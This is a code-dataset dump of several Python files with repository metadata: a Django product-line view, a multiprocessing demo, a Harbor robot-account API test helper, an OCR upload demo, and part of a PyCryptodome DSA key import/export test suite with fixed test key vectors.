获取idc,作为ztree的顶级
:param nodes:
:return:
'''
ret = []
for i in Idc.objects.all():
node = {
'name': i.idc_name,
'children': nodes, # nodes 就是上面一级业务线
'isParent': 'true', # 这里是json中的true
}
ret.append(node)
return ret
'''
4. 业务线详情
'''
class ProductGetView(LoginRequiredMixin, View):
def get(self, request):
ret = {"status": 0}
# 1 根据product id, 取指定的一条记录
p_id = self.request.GET.get("id", None)
p_pid = self.request.GET.get("pid", None)
if p_id:
ret["data"] = self.get_obj_dict(p_id)
# 2 根据product pid, 取出多条记录
if p_pid:
ret["data"] = self.get_products(p_pid)
# 3 不传任何值,所出所有记录
return JsonResponse(ret)
def get_obj_dict(self, p_id):
try:
obj = Product.objects.get(pk=p_id)
ret = obj.__dict__ # 我们是需要字典数据结构
ret.pop("_state") # 取出的字典数据,有多余的字段,见下面的测试
return ret
except Product.DoesNotExist:
return {}
def get_products(self, pid):
return list(Product.objects.filter(pid=pid).values())
'''
测试:
In [8]: p = Product.objects.get(pk=1)
In [9]: p
Out[9]: <Product: 物流系统>
In [10]: p.__dict__
Out[10]:
{'_state': <django.db.models.base.ModelState at 0x7f15855d17f0>,
'id': 1,
'service_name': '物流系统',
'module_letter': 'ALS',
'op_interface': 'zhang-1@ezbuy.com,zhang-3@ezbuy.com',
'dev_interface': 'zyl@qq.com,zhang-8@ezbuy.com',
'pid': 0}
In [11]: d = p.__dict__
In [12]: d
Out[12]:
{'_state': <django.db.models.base.ModelState at 0x7f15855d17f0>,
'id': 1,
'service_name': '物流系统',
'module_letter': 'ALS',
'op_interface': 'zhang-1@ezbuy.com,zhang-3@ezbuy.com',
'dev_interface': 'zyl@qq.com,zhang-8@ezbuy.com',
'pid': 0}
In [13]: d.pop('_state')
Out[13]: <django.db.models.base.ModelState at 0x7f15855d17f0>
In [14]: d
Out[14]:
{'id': 1,
'service_name': '物流系统',
'module_letter': 'ALS',
'op_interface': 'zhang-1@ezbuy.com,zhang-3@ezbuy.com',
'dev_interface': 'zyl@qq.com,zhang-8@ezbuy.com',
'pid': 0}
'''
|
[
"YilingZhang@YilingZhang.local"
] |
YilingZhang@YilingZhang.local
|
1bb1e3a577fac699b94553a18c892fb9eb2daf03
|
0f994ce5f6ac5afe2d574ee0bd763bafcbe4af0e
|
/demo/multiprocessing01.py
|
4138736af4ff2265d70ca2229b0c80750c332e35
|
[] |
no_license
|
jingjianqian/python
|
c0310f29219db47b014bf3c83bb6fb681fbc1f25
|
14ba40ebed57866ebd78875e782a295371cbf7fe
|
refs/heads/master
| 2023-03-16T06:57:12.343473
| 2023-03-13T13:48:07
| 2023-03-13T13:48:07
| 81,185,145
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 977
|
py
|
import multiprocessing
import os
import time
def sing(name, lyric, times):
for i in range(times):
print("老王唱歌ID:", os.getpid())
print(name + ": " + lyric)
def dance(name, danceStep, times):
for i in range(times):
print("老王跳舞ID:", os.getpid())
print(name + ":" + danceStep)
if __name__ == '__main__':
sing_process = multiprocessing.Process(target=sing, args=("隔壁老王", "我爱你老婆", 10))
dance_process = multiprocessing.Process(target=dance,kwargs={"times": 10, "name": "老王", "danceStep": "I will will,fuck you!"})
print("爸爸进程编号:", os.getpid())
print("爷爷进程编号:", os.getppid())
sing_process.daemon = True # 设置子进程为守护进程
dance_process.daemon = True # 设置子进程为守护进程
sing_process.start()
dance_process.start()
time.sleep(0.1)
# dance_process.daemon = True
print("主进程结束。。。。")
|
[
"18697998680@163.com"
] |
18697998680@163.com
|
6ef16ead219a63a61ae7974a59ef9b7476ded432
|
29c3cc5c19c54869e7f565c036a628fe6b598b35
|
/tests/apitests/python/library/robot.py
|
5a5fc280aaa3fa5359bd2d5795d6e3d1f9e05cca
|
[
"Apache-2.0"
] |
permissive
|
tmax-cloud/hyperregistry_no_support
|
ab1da648ba3458935c5b3bf0151341853f760219
|
058fe24f9efb9f0d51f27659b0959a8af735d0a0
|
refs/heads/main
| 2023-04-06T03:02:04.476266
| 2021-04-19T02:38:58
| 2021-04-19T02:38:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,649
|
py
|
# -*- coding: utf-8 -*-
import time
import base
import v2_swagger_client
from v2_swagger_client.rest import ApiException
from base import _assert_status_code
class Robot(base.Base, object):
def __init__(self):
super(Robot,self).__init__(api_type = "robot")
def list_robot(self, expect_status_code = 200, **kwargs):
client = self._get_client(**kwargs)
try:
body, status_code, _ = client.list_robot_with_http_info()
except ApiException as e:
base._assert_status_code(expect_status_code, e.status)
return []
else:
base._assert_status_code(expect_status_code, status_code)
base._assert_status_code(200, status_code)
return body
def create_access_list(self, right_map = [True] * 10):
_assert_status_code(10, len(right_map), r"Please input full access list for system robot account. Expected {}, while actual input count is {}.")
action_pull = "pull"
action_push = "push"
action_read = "read"
action_create = "create"
action_del = "delete"
access_def_list = [
("repository", action_pull),
("repository", action_push),
("artifact", action_del),
("helm-chart", action_read),
("helm-chart-version", action_create),
("helm-chart-version", action_del),
("tag", action_create),
("tag", action_del),
("artifact-label", action_create),
("scan", action_create)
]
access_list = []
for i in range(len(access_def_list)):
if right_map[i] is True:
robotAccountAccess = v2_swagger_client.Access(resource = access_def_list[i][0], action = access_def_list[i][1])
access_list.append(robotAccountAccess)
return access_list
def create_project_robot(self, project_name, duration, robot_name = None, robot_desc = None,
has_pull_right = True, has_push_right = True, has_chart_read_right = True,
has_chart_create_right = True, expect_status_code = 201, expect_response_body = None,
**kwargs):
if robot_name is None:
robot_name = base._random_name("robot")
if robot_desc is None:
robot_desc = base._random_name("robot_desc")
if has_pull_right is False and has_push_right is False:
has_pull_right = True
access_list = []
action_pull = "pull"
action_push = "push"
action_read = "read"
action_create = "create"
if has_pull_right is True:
robotAccountAccess = v2_swagger_client.Access(resource = "repository", action = action_pull)
access_list.append(robotAccountAccess)
if has_push_right is True:
robotAccountAccess = v2_swagger_client.Access(resource = "repository", action = action_push)
access_list.append(robotAccountAccess)
if has_chart_read_right is True:
robotAccountAccess = v2_swagger_client.Access(resource = "helm-chart", action = action_read)
access_list.append(robotAccountAccess)
if has_chart_create_right is True:
robotAccountAccess = v2_swagger_client.Access(resource = "helm-chart-version", action = action_create)
access_list.append(robotAccountAccess)
robotaccountPermissions = v2_swagger_client.RobotPermission(kind = "project", namespace = project_name, access = access_list)
permission_list = []
permission_list.append(robotaccountPermissions)
robotAccountCreate = v2_swagger_client.RobotCreate(name=robot_name, description=robot_desc, duration=duration, level="project", permissions = permission_list)
client = self._get_client(**kwargs)
data = []
try:
data, status_code, header = client.create_robot_with_http_info(robotAccountCreate)
except ApiException as e:
base._assert_status_code(expect_status_code, e.status)
if expect_response_body is not None:
base._assert_status_body(expect_response_body, e.body)
else:
base._assert_status_code(expect_status_code, status_code)
base._assert_status_code(201, status_code)
return base._get_id_from_header(header), data
def get_robot_account_by_id(self, robot_id, **kwargs):
client = self._get_client(**kwargs)
data, status_code, _ = client.get_robot_by_id_with_http_info(robot_id)
return data
def disable_robot_account(self, robot_id, disable, expect_status_code = 200, **kwargs):
client = self._get_client(**kwargs)
data = self.get_robot_account_by_id(robot_id, **kwargs)
robotAccountUpdate = v2_swagger_client.RobotCreate(name=data.name, description=data.description, duration=data.duration, level=data.level, permissions = data.permissions, disable = disable)
_, status_code, _ = client.update_robot_with_http_info(robot_id, robotAccountUpdate)
base._assert_status_code(expect_status_code, status_code)
base._assert_status_code(200, status_code)
def delete_robot_account(self, robot_id, expect_status_code = 200, **kwargs):
client = self._get_client(**kwargs)
_, status_code, _ = client.delete_robot_with_http_info(robot_id)
base._assert_status_code(expect_status_code, status_code)
base._assert_status_code(200, status_code)
def create_system_robot(self, permission_list, duration, robot_name = None, robot_desc = None, expect_status_code = 201, **kwargs):
if robot_name is None:
robot_name = base._random_name("robot")
if robot_desc is None:
robot_desc = base._random_name("robot_desc")
robotAccountCreate = v2_swagger_client.RobotCreate(name=robot_name, description=robot_desc, duration=duration, level="system", disable = False, permissions = permission_list)
print("robotAccountCreate:", robotAccountCreate)
client = self._get_client(**kwargs)
data = []
data, status_code, header = client.create_robot_with_http_info(robotAccountCreate)
base._assert_status_code(expect_status_code, status_code)
base._assert_status_code(201, status_code)
return base._get_id_from_header(header), data
def update_robot_account(self, robot_id, robot, expect_status_code = 200, **kwargs):
client = self._get_client(**kwargs)
_, status_code, _ = client.update_robot_with_http_info(robot_id, robot)
base._assert_status_code(expect_status_code, status_code)
base._assert_status_code(200, status_code)
def update_system_robot_account(self, robot_id, robot_name, robot_account_Permissions_list, disable = None, expect_status_code = 200, **kwargs):
robot = v2_swagger_client.Robot(id = robot_id, name = robot_name, level = "system", permissions = robot_account_Permissions_list)
if disable in (True, False):
robot.disable = disable
self.update_robot_account(robot_id, robot, expect_status_code = expect_status_code, **kwargs)
def refresh_robot_account_secret(self, robot_id, robot_new_sec, expect_status_code = 200, **kwargs):
robot_sec = v2_swagger_client.RobotSec(secret = robot_new_sec)
client = self._get_client(**kwargs)
data, status_code, _ = client.refresh_sec_with_http_info(robot_id, robot_sec)
base._assert_status_code(expect_status_code, status_code)
base._assert_status_code(200, status_code)
print("Refresh new secret:", data)
return data
|
[
"kyunghoon451@gmail.com"
] |
kyunghoon451@gmail.com
|
51973d58aa65467822f1a79425b654ce1519849c
|
28bdfca0131db38323fc28f6178425dc2c86e6ca
|
/test/ocr_detect_demo.py
|
593bfa686fa9e9d6660d2515225231592ddaeaf3
|
[] |
no_license
|
my-xh/hengDaProject
|
d8879d6755b24f230361b25d0e88d205fec98a1d
|
45aa43aabc798652a0f05d4e93d1c2c7ae819e4c
|
refs/heads/master
| 2023-04-20T07:04:57.424269
| 2021-05-13T11:46:48
| 2021-05-13T11:46:48
| 345,997,472
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 547
|
py
|
# -*- coding: utf-8 -*-
"""
@File : ocr_detect_demo.py
@Time : 2021/5/5 13:38
@Author : my-xh
@Version : 1.0
@Software: PyCharm
@Desc :
"""
import requests
url = 'http://192.168.1.101:8000/service/api/ocrdetect/'
# 上传图像并检测
tracker = None
img_path = 'ocrtest.png'
files = {
'image': ('filename2', open(img_path, 'rb'), 'image/jpeg')
}
res = requests.post(url, data=tracker, files=files).json().get('code')
# 显示识别内容
if res:
print(f'识别结果:\n{res.strip()}')
else:
print('识别失败!')
|
[
"2435128850@qq.com"
] |
2435128850@qq.com
|
8094c33ac4334a040146a3872ef016d04da6ad68
|
2205363ea412aae36aa2c5f8b7d608cd8a158a03
|
/Personal_Blog/venv/Lib/site-packages/Crypto/SelfTest/PublicKey/test_import_DSA.py
|
c2b5e16b633636f7656c384a0ea51e678be449a3
|
[] |
no_license
|
Akanksha2403/HacktoberFest2020
|
986ef7ba5595679085e5159d35c5a30d9e91ebc5
|
789762e3a4a3ad23fd2c1ca3b6cc3bc8f39eed82
|
refs/heads/master
| 2023-08-28T04:25:07.466359
| 2021-10-20T10:16:46
| 2021-10-20T10:16:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,034
|
py
|
# -*- coding: utf-8 -*-
#
# SelfTest/PublicKey/test_import_DSA.py: Self-test for importing DSA keys
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
import unittest
import re
from Crypto.PublicKey import DSA
from Crypto.SelfTest.st_common import *
from Crypto.Util.py3compat import *
from binascii import unhexlify
class ImportKeyTests(unittest.TestCase):
y = 92137165128186062214622779787483327510946462589285775188003362705875131352591574106484271700740858696583623951844732128165434284507709057439633739849986759064015013893156866539696757799934634945787496920169462601722830899660681779448742875054459716726855443681559131362852474817534616736104831095601710736729
p = 162452170958135306109773853318304545923250830605675936228618290525164105310663722368377131295055868997377338797580997938253236213714988311430600065853662861806894003694743806769284131194035848116051021923956699231855223389086646903420682639786976554552864568460372266462812137447840653688476258666833303658691
q = 988791743931120302950649732173330531512663554851
g = 85583152299197514738065570254868711517748965097380456700369348466136657764813442044039878840094809620913085570225318356734366886985903212775602770761953571967834823306046501307810937486758039063386311593890777319935391363872375452381836756832784184928202587843258855704771836753434368484556809100537243908232
x = 540873410045082450874416847965843801027716145253
def setUp(self):
# It is easier to write test vectors in text form,
# and convert them to byte strigs dynamically here
for mname, mvalue in ImportKeyTests.__dict__.items():
if mname[:4] in ('der_', 'pem_', 'ssh_'):
if mname[:4] == 'der_':
mvalue = unhexlify(tobytes(mvalue))
mvalue = tobytes(mvalue)
setattr(self, mname, mvalue)
# 1. SubjectPublicKeyInfo
der_public=\
'308201b73082012b06072a8648ce3804013082011e02818100e756ee1717f4b6'+\
'794c7c214724a19763742c45572b4b3f8ff3b44f3be9f44ce039a2757695ec91'+\
'5697da74ef914fcd1b05660e2419c761d639f45d2d79b802dbd23e7ab8b81b47'+\
'9a380e1f30932584ba2a0b955032342ebc83cb5ca906e7b0d7cd6fe656cecb4c'+\
'8b5a77123a8c6750a481e3b06057aff6aa6eba620b832d60c3021500ad32f48c'+\
'd3ae0c45a198a61fa4b5e20320763b2302818079dfdc3d614fe635fceb7eaeae'+\
'3718dc2efefb45282993ac6749dc83c223d8c1887296316b3b0b54466cf444f3'+\
'4b82e3554d0b90a778faaf1306f025dae6a3e36c7f93dd5bac4052b92370040a'+\
'ca70b8d5820599711900efbc961812c355dd9beffe0981da85c5548074b41c56'+\
'ae43fd300d89262e4efd89943f99a651b03888038185000281810083352a69a1'+\
'32f34843d2a0eb995bff4e2f083a73f0049d2c91ea2f0ce43d144abda48199e4'+\
'b003c570a8af83303d45105f606c5c48d925a40ed9c2630c2fa4cdbf838539de'+\
'b9a29f919085f2046369f627ca84b2cb1e2c7940564b670f963ab1164d4e2ca2'+\
'bf6ffd39f12f548928bf4d2d1b5e6980b4f1be4c92a91986fba559'
def testImportKey1(self):
key_obj = DSA.importKey(self.der_public)
self.failIf(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
def testExportKey1(self):
tup = (self.y, self.g, self.p, self.q)
key = DSA.construct(tup)
encoded = key.export_key('DER')
self.assertEqual(self.der_public, encoded)
# 2.
pem_public="""\
-----BEGIN PUBLIC KEY-----
MIIBtzCCASsGByqGSM44BAEwggEeAoGBAOdW7hcX9LZ5THwhRyShl2N0LEVXK0s/
j/O0Tzvp9EzgOaJ1dpXskVaX2nTvkU/NGwVmDiQZx2HWOfRdLXm4AtvSPnq4uBtH
mjgOHzCTJYS6KguVUDI0LryDy1ypBuew181v5lbOy0yLWncSOoxnUKSB47BgV6/2
qm66YguDLWDDAhUArTL0jNOuDEWhmKYfpLXiAyB2OyMCgYB539w9YU/mNfzrfq6u
NxjcLv77RSgpk6xnSdyDwiPYwYhyljFrOwtURmz0RPNLguNVTQuQp3j6rxMG8CXa
5qPjbH+T3VusQFK5I3AECspwuNWCBZlxGQDvvJYYEsNV3Zvv/gmB2oXFVIB0tBxW
rkP9MA2JJi5O/YmUP5mmUbA4iAOBhQACgYEAgzUqaaEy80hD0qDrmVv/Ti8IOnPw
BJ0skeovDOQ9FEq9pIGZ5LADxXCor4MwPUUQX2BsXEjZJaQO2cJjDC+kzb+DhTne
uaKfkZCF8gRjafYnyoSyyx4seUBWS2cPljqxFk1OLKK/b/058S9UiSi/TS0bXmmA
tPG+TJKpGYb7pVk=
-----END PUBLIC KEY-----"""
def testImportKey2(self):
for pem in (self.pem_public, tostr(self.pem_public)):
key_obj = DSA.importKey(pem)
self.failIf(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
def testExportKey2(self):
tup = (self.y, self.g, self.p, self.q)
key = DSA.construct(tup)
encoded = key.export_key('PEM')
self.assertEqual(self.pem_public, encoded)
# 3. OpenSSL/OpenSSH format
der_private=\
'308201bb02010002818100e756ee1717f4b6794c7c214724a19763742c45572b'+\
'4b3f8ff3b44f3be9f44ce039a2757695ec915697da74ef914fcd1b05660e2419'+\
'c761d639f45d2d79b802dbd23e7ab8b81b479a380e1f30932584ba2a0b955032'+\
'342ebc83cb5ca906e7b0d7cd6fe656cecb4c8b5a77123a8c6750a481e3b06057'+\
'aff6aa6eba620b832d60c3021500ad32f48cd3ae0c45a198a61fa4b5e2032076'+\
'3b2302818079dfdc3d614fe635fceb7eaeae3718dc2efefb45282993ac6749dc'+\
'83c223d8c1887296316b3b0b54466cf444f34b82e3554d0b90a778faaf1306f0'+\
'25dae6a3e36c7f93dd5bac4052b92370040aca70b8d5820599711900efbc9618'+\
'12c355dd9beffe0981da85c5548074b41c56ae43fd300d89262e4efd89943f99'+\
'a651b038880281810083352a69a132f34843d2a0eb995bff4e2f083a73f0049d'+\
'2c91ea2f0ce43d144abda48199e4b003c570a8af83303d45105f606c5c48d925'+\
'a40ed9c2630c2fa4cdbf838539deb9a29f919085f2046369f627ca84b2cb1e2c'+\
'7940564b670f963ab1164d4e2ca2bf6ffd39f12f548928bf4d2d1b5e6980b4f1'+\
'be4c92a91986fba55902145ebd9a3f0b82069d98420986b314215025756065'
def testImportKey3(self):
key_obj = DSA.importKey(self.der_private)
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
def testExportKey3(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
encoded = key.export_key('DER', pkcs8=False)
self.assertEqual(self.der_private, encoded)
# 4.
pem_private="""\
-----BEGIN DSA PRIVATE KEY-----
MIIBuwIBAAKBgQDnVu4XF/S2eUx8IUckoZdjdCxFVytLP4/ztE876fRM4DmidXaV
7JFWl9p075FPzRsFZg4kGcdh1jn0XS15uALb0j56uLgbR5o4Dh8wkyWEuioLlVAy
NC68g8tcqQbnsNfNb+ZWzstMi1p3EjqMZ1CkgeOwYFev9qpuumILgy1gwwIVAK0y
9IzTrgxFoZimH6S14gMgdjsjAoGAed/cPWFP5jX8636urjcY3C7++0UoKZOsZ0nc
g8Ij2MGIcpYxazsLVEZs9ETzS4LjVU0LkKd4+q8TBvAl2uaj42x/k91brEBSuSNw
BArKcLjVggWZcRkA77yWGBLDVd2b7/4JgdqFxVSAdLQcVq5D/TANiSYuTv2JlD+Z
plGwOIgCgYEAgzUqaaEy80hD0qDrmVv/Ti8IOnPwBJ0skeovDOQ9FEq9pIGZ5LAD
xXCor4MwPUUQX2BsXEjZJaQO2cJjDC+kzb+DhTneuaKfkZCF8gRjafYnyoSyyx4s
eUBWS2cPljqxFk1OLKK/b/058S9UiSi/TS0bXmmAtPG+TJKpGYb7pVkCFF69mj8L
ggadmEIJhrMUIVAldWBl
-----END DSA PRIVATE KEY-----"""
def testImportKey4(self):
for pem in (self.pem_private, tostr(self.pem_private)):
key_obj = DSA.importKey(pem)
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
def testExportKey4(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
encoded = key.export_key('PEM', pkcs8=False)
self.assertEqual(self.pem_private, encoded)
# 5. PKCS8 (unencrypted)
der_pkcs8=\
'3082014a0201003082012b06072a8648ce3804013082011e02818100e756ee17'+\
'17f4b6794c7c214724a19763742c45572b4b3f8ff3b44f3be9f44ce039a27576'+\
'95ec915697da74ef914fcd1b05660e2419c761d639f45d2d79b802dbd23e7ab8'+\
'b81b479a380e1f30932584ba2a0b955032342ebc83cb5ca906e7b0d7cd6fe656'+\
'cecb4c8b5a77123a8c6750a481e3b06057aff6aa6eba620b832d60c3021500ad'+\
'32f48cd3ae0c45a198a61fa4b5e20320763b2302818079dfdc3d614fe635fceb'+\
'7eaeae3718dc2efefb45282993ac6749dc83c223d8c1887296316b3b0b54466c'+\
'f444f34b82e3554d0b90a778faaf1306f025dae6a3e36c7f93dd5bac4052b923'+\
'70040aca70b8d5820599711900efbc961812c355dd9beffe0981da85c5548074'+\
'b41c56ae43fd300d89262e4efd89943f99a651b03888041602145ebd9a3f0b82'+\
'069d98420986b314215025756065'
def testImportKey5(self):
key_obj = DSA.importKey(self.der_pkcs8)
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
def testExportKey5(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
encoded = key.export_key('DER')
self.assertEqual(self.der_pkcs8, encoded)
encoded = key.export_key('DER', pkcs8=True)
self.assertEqual(self.der_pkcs8, encoded)
# 6.
pem_pkcs8="""\
-----BEGIN PRIVATE KEY-----
MIIBSgIBADCCASsGByqGSM44BAEwggEeAoGBAOdW7hcX9LZ5THwhRyShl2N0LEVX
K0s/j/O0Tzvp9EzgOaJ1dpXskVaX2nTvkU/NGwVmDiQZx2HWOfRdLXm4AtvSPnq4
uBtHmjgOHzCTJYS6KguVUDI0LryDy1ypBuew181v5lbOy0yLWncSOoxnUKSB47Bg
V6/2qm66YguDLWDDAhUArTL0jNOuDEWhmKYfpLXiAyB2OyMCgYB539w9YU/mNfzr
fq6uNxjcLv77RSgpk6xnSdyDwiPYwYhyljFrOwtURmz0RPNLguNVTQuQp3j6rxMG
8CXa5qPjbH+T3VusQFK5I3AECspwuNWCBZlxGQDvvJYYEsNV3Zvv/gmB2oXFVIB0
tBxWrkP9MA2JJi5O/YmUP5mmUbA4iAQWAhRevZo/C4IGnZhCCYazFCFQJXVgZQ==
-----END PRIVATE KEY-----"""
def testImportKey6(self):
for pem in (self.pem_pkcs8, tostr(self.pem_pkcs8)):
key_obj = DSA.importKey(pem)
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
def testExportKey6(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
encoded = key.export_key('PEM')
self.assertEqual(self.pem_pkcs8, encoded)
encoded = key.export_key('PEM', pkcs8=True)
self.assertEqual(self.pem_pkcs8, encoded)
# 7. OpenSSH/RFC4253
ssh_pub="""ssh-dss AAAAB3NzaC1kc3MAAACBAOdW7hcX9LZ5THwhRyShl2N0LEVXK0s/j/O0Tzvp9EzgOaJ1dpXskVaX2nTvkU/NGwVmDiQZx2HWOfRdLXm4AtvSPnq4uBtHmjgOHzCTJYS6KguVUDI0LryDy1ypBuew181v5lbOy0yLWncSOoxnUKSB47BgV6/2qm66YguDLWDDAAAAFQCtMvSM064MRaGYph+kteIDIHY7IwAAAIB539w9YU/mNfzrfq6uNxjcLv77RSgpk6xnSdyDwiPYwYhyljFrOwtURmz0RPNLguNVTQuQp3j6rxMG8CXa5qPjbH+T3VusQFK5I3AECspwuNWCBZlxGQDvvJYYEsNV3Zvv/gmB2oXFVIB0tBxWrkP9MA2JJi5O/YmUP5mmUbA4iAAAAIEAgzUqaaEy80hD0qDrmVv/Ti8IOnPwBJ0skeovDOQ9FEq9pIGZ5LADxXCor4MwPUUQX2BsXEjZJaQO2cJjDC+kzb+DhTneuaKfkZCF8gRjafYnyoSyyx4seUBWS2cPljqxFk1OLKK/b/058S9UiSi/TS0bXmmAtPG+TJKpGYb7pVk="""
def testImportKey7(self):
for ssh in (self.ssh_pub, tostr(self.ssh_pub)):
key_obj = DSA.importKey(ssh)
self.failIf(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
def testExportKey7(self):
tup = (self.y, self.g, self.p, self.q)
key = DSA.construct(tup)
encoded = key.export_key('OpenSSH')
self.assertEqual(self.ssh_pub, encoded)
# 8. Encrypted OpenSSL/OpenSSH
pem_private_encrypted="""\
-----BEGIN DSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,70B6908939D65E9F2EB999E8729788CE
4V6GHRDpCrdZ8MBjbyp5AlGUrjvr2Pn2e2zVxy5RBt4FBj9/pa0ae0nnyUPMLSUU
kKyOR0topRYTVRLElm4qVrb5uNZ3hRwfbklr+pSrB7O9eHz9V5sfOQxyODS07JxK
k1OdOs70/ouMXLF9EWfAZOmWUccZKHNblUwg1p1UrZIz5jXw4dUE/zqhvXh6d+iC
ADsICaBCjCrRQJKDp50h3+ndQjkYBKVH+pj8TiQ79U7lAvdp3+iMghQN6YXs9mdI
gFpWw/f97oWM4GHZFqHJ+VSMNFjBiFhAvYV587d7Lk4dhD8sCfbxj42PnfRgUItc
nnPqHxmhMQozBWzYM4mQuo3XbF2WlsNFbOzFVyGhw1Bx1s91qvXBVWJh2ozrW0s6
HYDV7ZkcTml/4kjA/d+mve6LZ8kuuR1qCiZx6rkffhh1gDN/1Xz3HVvIy/dQ+h9s
5zp7PwUoWbhqp3WCOr156P6gR8qo7OlT6wMh33FSXK/mxikHK136fV2shwTKQVII
rJBvXpj8nACUmi7scKuTWGeUoXa+dwTZVVe+b+L2U1ZM7+h/neTJiXn7u99PFUwu
xVJtxaV37m3aXxtCsPnbBg==
-----END DSA PRIVATE KEY-----"""
def testImportKey8(self):
for pem in (self.pem_private_encrypted, tostr(self.pem_private_encrypted)):
key_obj = DSA.importKey(pem, "PWDTEST")
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
def testExportKey8(self):
tup = (self.y, self.g, self.p, self.q, self.x)
key = DSA.construct(tup)
encoded = key.export_key('PEM', pkcs8=False, passphrase="PWDTEST")
key = DSA.importKey(encoded, "PWDTEST")
self.assertEqual(self.y, key.y)
self.assertEqual(self.p, key.p)
self.assertEqual(self.q, key.q)
self.assertEqual(self.g, key.g)
self.assertEqual(self.x, key.x)
# 9. Encrypted PKCS8
# pbeWithMD5AndDES-CBC
pem_pkcs8_encrypted="""\
-----BEGIN ENCRYPTED PRIVATE KEY-----
MIIBcTAbBgkqhkiG9w0BBQMwDgQI0GC3BJ/jSw8CAggABIIBUHc1cXZpExIE9tC7
7ryiW+5ihtF2Ekurq3e408GYSAu5smJjN2bvQXmzRFBz8W38K8eMf1sbWroZ4+zn
kZSbb9nSm5kAa8lR2+oF2k+WRswMR/PTC3f/D9STO2X0QxdrzKgIHEcSGSHp5jTx
aVvbkCDHo9vhBTl6S3ogZ48As/MEro76+9igUwJ1jNhIQZPJ7e20QH5qDpQFFJN4
CKl2ENSEuwGiqBszItFy4dqH0g63ZGZV/xt9wSO9Rd7SK/EbA/dklOxBa5Y/VItM
gnIhs9XDMoGYyn6F023EicNJm6g/bVQk81BTTma4tm+12TKGdYm+QkeZvCOMZylr
Wv67cKwO3cAXt5C3QXMDgYR64XvuaT5h7C0igMp2afSXJlnbHEbFxQVJlv83T4FM
eZ4k+NQDbEL8GiHmFxzDWQAuPPZKJWEEEV2p/To+WOh+kSDHQw==
-----END ENCRYPTED PRIVATE KEY-----"""
def testImportKey9(self):
for pem in (self.pem_pkcs8_encrypted, tostr(self.pem_pkcs8_encrypted)):
key_obj = DSA.importKey(pem, "PWDTEST")
self.failUnless(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
self.assertEqual(self.x, key_obj.x)
# 10. Encrypted PKCS8
# pkcs5PBES2 /
# pkcs5PBKDF2 (rounds=1000, salt=D725BF1B6B8239F4) /
# des-EDE3-CBC (iv=27A1C66C42AFEECE)
#
der_pkcs8_encrypted=\
'30820196304006092a864886f70d01050d3033301b06092a864886f70d01050c'+\
'300e0408d725bf1b6b8239f4020203e8301406082a864886f70d0307040827a1'+\
'c66c42afeece048201505cacfde7bf8edabb3e0d387950dc872662ea7e9b1ed4'+\
'400d2e7e6186284b64668d8d0328c33a9d9397e6f03df7cb68268b0a06b4e22f'+\
'7d132821449ecf998a8b696dbc6dd2b19e66d7eb2edfeb4153c1771d49702395'+\
'4f36072868b5fcccf93413a5ac4b2eb47d4b3f681c6bd67ae363ed776f45ae47'+\
'174a00098a7c930a50f820b227ddf50f9742d8e950d02586ff2dac0e3c372248'+\
'e5f9b6a7a02f4004f20c87913e0f7b52bccc209b95d478256a890b31d4c9adec'+\
'21a4d157a179a93a3dad06f94f3ce486b46dfa7fc15fd852dd7680bbb2f17478'+\
